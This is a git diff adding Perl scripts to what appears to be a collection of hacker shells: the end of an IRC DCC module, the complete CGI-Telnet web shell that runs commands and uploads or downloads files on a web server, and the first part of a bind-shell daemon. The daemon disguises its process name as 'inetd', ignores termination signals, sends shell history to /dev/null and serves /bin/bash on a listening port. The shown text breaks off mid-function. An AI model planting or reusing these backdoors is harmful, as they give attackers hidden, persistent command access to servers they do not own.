+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+}
+
+
+                                                                                                                     by Danilo
+
+
+
+ 
diff --git a/xakep-shells/PERL/telnet.pl.txt b/xakep-shells/PERL/telnet.pl.txt
new file mode 100644
index 0000000..774fcdc
--- /dev/null
+++ b/xakep-shells/PERL/telnet.pl.txt
@@ -0,0 +1,692 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "1236987navaro";		# Change this. You will need to enter this
+				# to login.
+
+$WinNT = 0;			# You need to change the value of this to 1 if
+				# you're running this script on a Windows NT
+				# machine. If you're running it on Unix, you
+				# can leave the value as it is.
+
+$NTCmdSep = "&";		# This character is used to seperate 2 commands
+				# in a command line on Windows NT.
+
+$UnixCmdSep = ";";		# This character is used to seperate 2 commands
+				# in a command line on Unix.
+
+$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
+				# Don't set this to a very large value. This is
+				# useful for commands that may hang or that
+				# take very long to execute, like "find /".
+				# This is valid only on Unix servers. It is
+				# ignored on NT Servers.
+
+$ShowDynamicOutput = 1;		# If this is 1, then data is sent to the
+				# browser as soon as it is output, otherwise
+				# it is buffered and send when the command
+				# completes. This is useful for commands like
+				# ping, so that you can see the output as it
+				# is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse 
+{
+	local (*in) = @_ if @_;
+	local ($i, $loc, $key, $val);
+	
+	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+	if($ENV{'REQUEST_METHOD'} eq "GET")
+	{
+		$in = $ENV{'QUERY_STRING'};
+	}
+	elsif($ENV{'REQUEST_METHOD'} eq "POST")
+	{
+		binmode(STDIN) if $MultipartFormData & $WinNT;
+		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+	}
+
+	# handle file upload data
+	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+	{
+		$Boundary = '--'.$1; # please refer to RFC1867 
+		@list = split(/$Boundary/, $in); 
+		$HeaderBody = $list[1];
+		$HeaderBody =~ /\r\n\r\n|\n\n/;
+		$Header = $`;
+		$Body = $';
+ 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+		$in{'filedata'} = $Body;
+		$Header =~ /filename=\"(.+)\"/; 
+		$in{'f'} = $1; 
+		$in{'f'} =~ s/\"//g;
+		$in{'f'} =~ s/\s//g;
+
+		# parse trailer
+		for($i=2; $list[$i]; $i++)
+		{ 
+			$list[$i] =~ s/^.+name=$//;
+			$list[$i] =~ /\"(\w+)\"/;
+			$key = $1;
+			$val = $';
+			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} = $val; 
+		}
+	}
+	else # standard post data (url encoded, not multipart)
+	{
+		@in = split(/&/, $in);
+		foreach $i (0 .. $#in)
+		{
+			$in[$i] =~ s/\+/ /g;
+			($key, $val) = split(/=/, $in[$i], 2);
+			$key =~ s/%(..)/pack("c", hex($1))/ge;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} .= "\0" if (defined($in{$key}));
+			$in{$key} .= $val;
+		}
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+	$EncodedCurrentDir = $CurrentDir;
+	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+	print "Content-type: text/html\n\n";
+	print <<END;
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+	$Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+                                         
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          / 
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+	print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+	print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+	print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+	foreach $cookie(@httpcookies)
+	{
+		($id, $val) = split(/=/, $cookie);
+		$Cookies{$id} = $val;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+	print "<code>Connection closed by foreign host.<br><br></code>";
+}
+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+	&PrintPageHeader("p");
+	&PrintLogoutScreen;
+	&PrintLoginScreen;
+	&PrintLoginForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin 
+{
+	if($LoginPassword eq $Password) # password matched
+	{
+		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+		&PrintPageHeader("c");
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # password didn't match
+	{
+		&PrintPageHeader("p");
+		&PrintLoginScreen;
+		if($LoginPassword ne "") # some password was entered
+		{
+			&PrintLoginFailedMessage;
+		}
+		&PrintLoginForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+	if(!$WinNT)
+	{
+		alarm(0);
+		print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+		exit;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+	{
+		# we change the directory internally. The output of the
+		# command is not displayed.
+		
+		$OldDir = $CurrentDir;
+		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+		chop($CurrentDir = `$Command`);
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+		print "<code>$Prompt $RunCommand</code>";
+	}
+	else # some other command, display the output
+	{
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+		print "<code>$Prompt $RunCommand</code><xmp>";
+		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+		if(!$WinNT)
+		{
+			$SIG{'ALRM'} = \&CommandTimeout;
+			alarm($CommandTimeoutDuration);
+		}
+		if($ShowDynamicOutput) # show output as it is generated
+		{
+			$|=1;
+			$Command .= " |";
+			open(CommandOutput, $Command);
+			while(<CommandOutput>)
+			{
+				$_ =~ s/(\n|\r\n)$//;
+				print "$_\n";
+			}
+			$|=0;
+		}
+		else # show output after command completes
+		{
+			print `$Command`;
+		}
+		if(!$WinNT)
+		{
+			alarm(0);
+		}
+		print "</xmp>";
+	}
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+	local($FileUrl) = @_;
+	if(-e $FileUrl) # if the file exists
+	{
+		# encode the file link so we can send it to the browser
+		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+		&PrintPageHeader("c");
+		print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # file doesn't exist
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $FileUrl: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+	local($SendFile) = @_;
+	if(open(SENDFILE, $SendFile)) # file opened for reading
+	{
+		if($WinNT)
+		{
+			binmode(SENDFILE);
+			binmode(STDOUT);
+		}
+		$FileSize = (stat($SendFile))[7];
+		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+		print "Content-Type: application/x-unknown\n";
+		print "Content-Length: $FileSize\n";
+		print "Content-Disposition: attachment; filename=$1\n\n";
+		print while(<SENDFILE>);
+		close(SENDFILE);
+	}
+	else # failed to open file
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $SendFile: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+	# if no file is specified, print the upload form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileUploadForm;
+		&PrintPageFooter;
+		return;
+	}
+	&PrintPageHeader("c");
+
+	# start the uploading process
+	print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+	# get the fullly qualified pathname of the file to be created
+	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+	$TransferFile =~ m!([^/^\\]*)$!;
+	$TargetName .= $PathSep.$1;
+
+	$TargetFileSize = length($in{'filedata'});
+	# if the file exists and we are not supposed to overwrite it
+	if(-e $TargetName && $Options ne "overwrite")
+	{
+		print "Failed: Destination file already exists.<br>";
+	}
+	else # file is not present
+	{
+		if(open(UPLOADFILE, ">$TargetName"))
+		{
+			binmode(UPLOADFILE) if $WinNT;
+			print UPLOADFILE $in{'filedata'};
+			close(UPLOADFILE);
+			print "Transfered $TargetFileSize Bytes.<br>";
+			print "File Path: $TargetName<br>";
+		}
+		else
+		{
+			print "Failed: $!<br>";
+		}
+	}
+	print "</code>";
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+	# if no file is specified, print the download form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+		return;
+	}
+	
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+	&PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+	&ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+	&UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+	&DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+	&PerformLogout;
+}
diff --git a/xakep-shells/PERL/telnetd.pl.txt b/xakep-shells/PERL/telnetd.pl.txt
new file mode 100644
index 0000000..aa1d004
--- /dev/null
+++ b/xakep-shells/PERL/telnetd.pl.txt
@@ -0,0 +1,462 @@
+#!/usr/bin/perl
+# Telnet-like Standard Daemon 0.7
+#
+#    0ldW0lf - oldwolf@atrixteam.net
+#            - old-wolf@zipmai.com
+#            - www.atrix.cjb.net
+#            - www.atrixteam.net
+#
+#  For those guys that still like to open ports
+#  and use non-rooted boxes
+#
+#  This has been developed to join in the TocToc
+#  project code, now it's done and I'm distributing
+#  this separated
+#
+#  This one i made without IO::Pty so it uses
+#  only standard modules... enjoy it
+#
+#  tested on linux boxes.. probably will work fine on others
+#  any problem... #atrix@irc.brasnet.org
+#
+
+##########################################################
+# ******************* CONFIGURATION ******************** #
+##########################################################
+my $PORT        = $ARGV[0] || 3847;        # default port is 3847
+my $PASS        = '';         # encripted password
+my $SHELL       = "/bin/bash";             # shell to be executed
+my $HOME        = "/tmp";                  # your HOME
+my $PROC        = "inetd";                 # name of the process
+my $PASS_PROMPT = "Password: ";            # password prompt
+my $WRONG_PASS  = "Wrong password!";       # "wrong password" message
+my @STTY        = ('sane', 'dec');         # stty arguments
+##########################################################
+
+# feel free to change the ENV
+#### ENVironment ####
+$ENV{HOME}       = $HOME;
+#$ENV{PS1}        = '[\u@\h \W]: '; # the way i like :)
+                 # colorful PS1 is also funny :)
+$ENV{PS1}        = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
+$ENV{MAIL}       = '/var/mail/root';
+$ENV{PATH}       = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
+$ENV{HISTFILE}   = '/dev/null';
+$ENV{USER}       = 'root';
+$ENV{LOGNAME}    = 'root';
+$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
+$ENV{LS_COLORS}  = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
+$ENV{SHELL}      = $SHELL;
+$ENV{TERM}       = 'xterm';
+#####################
+
+$0=$PROC."\0";
+
+use IO::Socket;
+use IO::Select;
+use POSIX;
+use strict;
+
+# i wouldn't change that
+# if i were you
+###### SIGnals ######
+$SIG{HUP}  = 'IGNORE';
+$SIG{PS}   = 'IGNORE';
+$SIG{TERM} = 'IGNORE';
+$SIG{CHLD} = sub { wait; };
+#####################
+
+
+# ioctl stuff
+my %IOCTLDEF;
+$IOCTLDEF{TIOCSWINSZ} = 0x5414;
+$IOCTLDEF{TIOCNOTTY}  = 0x5422;
+$IOCTLDEF{TIOCSCTTY}  = 0x540E;
+safeload('sys/ttycom.ph', 1); # BSD
+safeload('sys/ioctl.ph', 1);
+safeload('asm/ioctls.ph', 1);
+
+foreach my $IOCTL (keys(%IOCTLDEF)) {
+  next if (defined(&{$IOCTL}));
+
+  if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
+    while(<IOD>) {
+      if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
+        eval "sub $IOCTL () {$1;}";
+        last;
+      }
+    }
+    close(IOD);
+  }
+
+  # i realy dunno if i can do that.. but.. here it goes
+  eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
+}
+
+
+# starting...
+$PORT = $ARGV[0] if ($ARGV[0]);
+chdir('/');
+
+no strict 'refs';
+my $bindfd = *{'bind_sock'};
+*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
+my $bind = \*{$bindfd};
+
+my $pid = fork();
+die "ERROR: I could not fork() the process." unless defined($pid);
+exit if $pid;
+
+
+my %CLIENT;
+my $sel_serv = IO::Select->new($bind);
+my $sel_shell = IO::Select->new();
+
+
+# main loop...
+while ( 1 ) {
+  select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
+
+  read_clients();
+  read_shells();
+}
+
+sub read_clients {
+  map { read_client($_) } ($sel_serv->can_read(0.01));
+}
+
+sub read_client {
+  my $fh = shift;
+
+  if ($fh eq $bind) {
+    my $newcon = $bind->accept;
+    $sel_serv->add($newcon);
+    $CLIENT{$newcon}->{senha} = 0;
+    $CLIENT{$newcon}->{sock} = $newcon;
+    $fh->autoflush(1);
+    do_client($newcon, '3', '5', '1');
+    sleep(1);
+    write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
+  } else {
+      my $msg;
+      my $nread = sysread($fh, $msg, 1024);
+
+      if ($nread == 0) {
+        close_client($fh);
+      } else {
+         telnet_parse($fh, $msg);
+      }
+  }
+}
+
+sub read_shells {
+  map { read_shell($_) } ($sel_shell->can_read(0.01));
+}
+
+sub telnet_parse {
+  my ($cli, $msg) = @_;
+  my $char = (split('', $msg))[0];
+
+  if (ord($char) == 255) {
+     chr_parse($cli, $msg);
+  } else {
+     if ($CLIENT{$cli}->{senha} == 0) {
+       $CLIENT{$cli}->{buf} .= $msg;
+
+       return() unless ($msg =~ /\r|\n/);
+
+       my $pass = $CLIENT{$cli}->{buf};
+       $CLIENT{$cli}->{buf} = '';
+
+       $pass =~ s/\n//g;
+       $pass =~ s/\0//g;
+       $pass =~ s/\r//g;
+
+       if (crypt($pass, $PASS) ne $PASS) {
+         finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
+       } else {
+          $CLIENT{$cli}->{senha} = 1;
+          write_client($cli, chr(255).chr(253).chr(31));
+          write_client($cli, "\r\n\r\r\n\r");
+          new_shell($cli);
+       }
+       return();
+     }
+
+     $msg =~ s/\r\n\0\0//g;
+     $msg =~ s/\0//g;
+     $msg =~ s/\r\n/\n/g;
